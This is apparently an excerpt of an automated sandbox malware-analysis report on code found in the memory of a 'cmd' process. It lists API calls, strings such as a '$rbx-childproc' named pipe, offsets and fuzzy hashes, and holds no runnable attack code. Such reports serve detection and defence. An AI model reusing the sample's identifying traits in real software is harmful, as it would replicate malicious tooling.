\\.\pipe\$rbx-childproc, xrefs: 0000022123C22549

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: f0dc3a13645bd13ef48d8ec83e5efc2ce4545bbb1c3bba5a7d18cff537318322
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 45117C32618B54D2E7108B61F558B5A7760F398BD4F945312FE990ABA8CF3DC2A4CB40

Function 0000022123BF7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000022123BF7078
__scrt_acquire_startup_lock.LIBCMT ref: 0000022123BF70CA
_RTC_Initialize.LIBCMT ref: 0000022123BF70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000022123BF711E
__scrt_release_startup_lock.LIBCMT ref: 0000022123BF7149

Memory Dump Source

Source File: 00000012.00000003.2617452152.0000022123BF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BF0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bf0000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 35bb464337efe15b74f8acbcd8b32768e5b2c1632e3ed7032fcb29791d7c1df7
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: E481D420700265F7F670BFE5984AF5962D0ABB67C0F147395BD044FB96DA3AC5B68700

Function 0000022123C57C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000022123C57C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000022123C57CCA
_RTC_Initialize.LIBCMT ref: 0000022123C57CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000022123C57D1E
__scrt_release_startup_lock.LIBCMT ref: 0000022123C57D49

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 4a9e7cb08c64beb4deaf9ea96d27dd6b0f95e48ac4bdbcd0c71d09e4d156ee8e
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: AD81E82070477CEAFA609BE5B44DB692691A7B1784F546327BE096F3D2DB38C8F18700

Function 0000022123BC7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000022123BC7078
__scrt_acquire_startup_lock.LIBCMT ref: 0000022123BC70CA
_RTC_Initialize.LIBCMT ref: 0000022123BC70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000022123BC711E
__scrt_release_startup_lock.LIBCMT ref: 0000022123BC7149

Memory Dump Source

Source File: 00000012.00000003.2617455752.0000022123BC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000022123BC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_3_22123bc0000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: a91f8ab79a7fa99e6a63271bd5718e50708528def7f9b106c68ef8ebb92718c1
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 1D81E520700265EEFA74BFE6984FF992290EBB6780F144B15FD494FB96DA38C466C700

Function 0000022123C27C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000022123C27C78
__scrt_acquire_startup_lock.LIBCMT ref: 0000022123C27CCA
_RTC_Initialize.LIBCMT ref: 0000022123C27CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000022123C27D1E
__scrt_release_startup_lock.LIBCMT ref: 0000022123C27D49

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 30a8ab7fe086f3a11c49135b9efe97fd424fb8da06ce2693af3d77f50ed91fbe
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 5781C42060477CE6FA50ABE59499B696290AB75784F447327BE4C4F397DB38C8F18300

Function 0000022123C59AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000022123C59C6B,?,?,?,0000022123C5945C,?,?,?,?,0000022123C58F65), ref: 0000022123C59B31
GetLastError.KERNEL32(?,?,?,0000022123C59C6B,?,?,?,0000022123C5945C,?,?,?,?,0000022123C58F65), ref: 0000022123C59B3F
LoadLibraryExW.KERNEL32(?,?,?,0000022123C59C6B,?,?,?,0000022123C5945C,?,?,?,?,0000022123C58F65), ref: 0000022123C59B69
FreeLibrary.KERNEL32(?,?,?,0000022123C59C6B,?,?,?,0000022123C5945C,?,?,?,?,0000022123C58F65), ref: 0000022123C59BD7
GetProcAddress.KERNEL32(?,?,?,0000022123C59C6B,?,?,?,0000022123C5945C,?,?,?,?,0000022123C58F65), ref: 0000022123C59BE3

Strings

api-ms-, xrefs: 0000022123C59B51

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: db1da881f09a12c94f6147342c52c70e79cb3214eff346e492276e49ff7e296a
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 0431C621212768E5FE259B82B808B9533A4F7A4BA0F592766FD1D5F7D0EF38D4B48700

Function 0000022123C29AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,0000022123C29C6B,?,?,?,0000022123C2945C,?,?,?,?,0000022123C28F65), ref: 0000022123C29B31
GetLastError.KERNEL32(?,?,?,0000022123C29C6B,?,?,?,0000022123C2945C,?,?,?,?,0000022123C28F65), ref: 0000022123C29B3F
LoadLibraryExW.KERNEL32(?,?,?,0000022123C29C6B,?,?,?,0000022123C2945C,?,?,?,?,0000022123C28F65), ref: 0000022123C29B69
FreeLibrary.KERNEL32(?,?,?,0000022123C29C6B,?,?,?,0000022123C2945C,?,?,?,?,0000022123C28F65), ref: 0000022123C29BD7
GetProcAddress.KERNEL32(?,?,?,0000022123C29C6B,?,?,?,0000022123C2945C,?,?,?,?,0000022123C28F65), ref: 0000022123C29BE3

Strings

api-ms-, xrefs: 0000022123C29B51

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 0bd9b52d13c2eff6a9c61b6d2b2117c531ddcd5b006dfa92630b3eba9b0fef2e
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 3A31C321312668E1EE25DB969808FA523A4BB69BA0F592727FD1D4F794DF38C4B4C310

Function 0000022123C63400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000022123C63431
GetLastError.KERNEL32 ref: 0000022123C6343D
CloseHandle.KERNEL32 ref: 0000022123C63455
CreateFileW.KERNEL32 ref: 0000022123C63480
WriteConsoleW.KERNEL32 ref: 0000022123C6349F

Strings

CONOUT$, xrefs: 0000022123C63461

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 62d07b6512f648e87b5f3fe9092929fa70d23600ae2bfade2fcf7b5efe49fe0f
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 6611B431214A64CAE3508B96E858B1967A4F398BF4F501325FE1D8B794CF38D4748B40

Function 0000022123C33400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000022123C33431
GetLastError.KERNEL32 ref: 0000022123C3343D
CloseHandle.KERNEL32 ref: 0000022123C33455
CreateFileW.KERNEL32 ref: 0000022123C33480
WriteConsoleW.KERNEL32 ref: 0000022123C3349F

Strings

CONOUT$, xrefs: 0000022123C33461

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: de7f6f7185da1a32f7242c7c1403de5c2a6fdd0a87d9cc91111aca8e2056ed08
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: C9119031310B64D6E7508B92E858B19B6A0F3A8BE4F401316FE5E8BB94CF39C6B48740

Function 0000022123C56270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022123C562AB
GetThreadContext.KERNEL32 ref: 0000022123C56415

Part of subcall function 0000022123C560A0: GetCurrentThreadId.KERNEL32 ref: 0000022123C560A4

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: ed7898dc6dec7c1cb2bef08c80be0261e46bfea31a3e693d867eb08c9db76288
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: E9D1A936205B98D1DA70DB4AF49875A77A0F398B98F502216EE8D5B7A5CF3CC5B1CB00

Function 0000022123C26270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000022123C262AB
GetThreadContext.KERNEL32 ref: 0000022123C26415

Part of subcall function 0000022123C260A0: GetCurrentThreadId.KERNEL32 ref: 0000022123C260A4

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: be0e8397c5f4f26ea3e6a5602ec5a7b9719198e2dbac8eed66db8295ed2c6c64
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 88D1BB36204B98D5DA70DB4AE49875AB7A0F398B98F101216EECD4B7A5CF7CC5B1CB10

Function 0000022123C52098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000022123C520A6
TlsFree.KERNEL32 ref: 0000022123C5225F
TlsFree.KERNEL32 ref: 0000022123C5226B
TlsFree.KERNEL32 ref: 0000022123C52277
TlsFree.KERNEL32 ref: 0000022123C52283
TlsFree.KERNEL32 ref: 0000022123C5228F

Part of subcall function 0000022123C55E50: GetCurrentThreadId.KERNEL32 ref: 0000022123C55E66

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 8beb3a105ca847665b3654b47053aa71ec8f9b1ab897d9b6b1916c86450ee499
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 9D513A30211B2DE5EB06DBA4E859A9833A5FB24744F802A13BD1D1E3E9EF78D5B5C340

Function 0000022123C22098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0000022123C220A6
TlsFree.KERNEL32 ref: 0000022123C2225F
TlsFree.KERNEL32 ref: 0000022123C2226B
TlsFree.KERNEL32 ref: 0000022123C22277
TlsFree.KERNEL32 ref: 0000022123C22283
TlsFree.KERNEL32 ref: 0000022123C2228F

Part of subcall function 0000022123C25E50: GetCurrentThreadId.KERNEL32 ref: 0000022123C25E66

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: efdfc3e8518672e836f804c8f670068076374954f1ad2ef609bd8ec74c157cc9
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 3D510930211B6DE5EB45DBA4DC59B9433A1FB24744F806A17BE6C0A3A9EF78C5B5C340

Function 0000022123C535C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,0000022123C524D1), ref: 0000022123C535EB
HeapAlloc.KERNEL32(?,?,?,?,?,0000022123C524D1), ref: 0000022123C535FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,0000022123C524D1), ref: 0000022123C53673
GetProcessHeap.KERNEL32(?,?,?,?,?,0000022123C524D1), ref: 0000022123C536D9
HeapFree.KERNEL32(?,?,?,?,?,0000022123C524D1), ref: 0000022123C536E7

Strings

$rbx-, xrefs: 0000022123C5366C

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 2c277d7d5ec8dd8c88207c1543d70fea0ed7abdbf8f415d5d18a3bda59b27ee1
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 8F31E721702B69E7EB51CF96F548B6963A0FBA4B84F085226AF481F795EF34D4F18700

Function 0000022123C5C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000022123C5C94F
SetLastError.KERNEL32 ref: 0000022123C5C96E
FlsSetValue.KERNEL32 ref: 0000022123C5C997
FlsSetValue.KERNEL32 ref: 0000022123C5C9A8
FlsSetValue.KERNEL32 ref: 0000022123C5C9B9

Part of subcall function 0000022123C5D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000022123C5674A), ref: 0000022123C5D2B6
Part of subcall function 0000022123C5D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000022123C5674A), ref: 0000022123C5D2C0

SetLastError.KERNEL32 ref: 0000022123C5C9DC

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c50000_cmd.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 9e72d4a046e0169157d5891e57defe4355899369649b3479e30c8658fc5b8080
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 0D118221200378E2F61867B1B81DB6E1245ABA47A0F54B327FD266E7C6CE28E4F14300

Function 0000022123C2C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000022123C2C94F
SetLastError.KERNEL32 ref: 0000022123C2C96E
FlsSetValue.KERNEL32 ref: 0000022123C2C997
FlsSetValue.KERNEL32 ref: 0000022123C2C9A8
FlsSetValue.KERNEL32 ref: 0000022123C2C9B9

Part of subcall function 0000022123C2D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,0000022123C2674A), ref: 0000022123C2D2B6
Part of subcall function 0000022123C2D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,0000022123C2674A), ref: 0000022123C2D2C0

SetLastError.KERNEL32 ref: 0000022123C2C9DC

Memory Dump Source

Source File: 00000012.00000002.2998588852.0000022123C21000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C20000, based on PE: true

Associated: 00000012.00000002.2997162745.0000022123C20000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3000130252.0000022123C35000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3001424297.0000022123C40000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3002716570.0000022123C42000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3004035150.0000022123C49000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22123c20000_cmd.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: eb734aebb5ca11e246d30d2fc613ae7e4b66df255f56628ce00a650d0707b26b
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: BD11302120067CE2F61477B2A81DF6A11519BB57A0F54B727BD6E5E3CACE38D4B18200

Function 0000022123C51A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000022123C51A56
K32GetModuleFileNameExW.KERNEL32 ref: 0000022123C51A74
PathFindFileNameW.SHLWAPI ref: 0000022123C51A83
lstrlenW.KERNEL32 ref: 0000022123C51A8F
StrCpyW.SHLWAPI ref: 0000022123C51AA2
CloseHandle.KERNEL32 ref: 0000022123C51AB0

Memory Dump Source

Source File: 00000012.00000002.3006643268.0000022123C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022123C50000, based on PE: true

Associated: 00000012.00000002.3005383829.0000022123C50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3008097319.0000022123C65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3009442821.0000022123C70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3010698681.0000022123C72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000012.00000002.3011903929.0000022123C79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

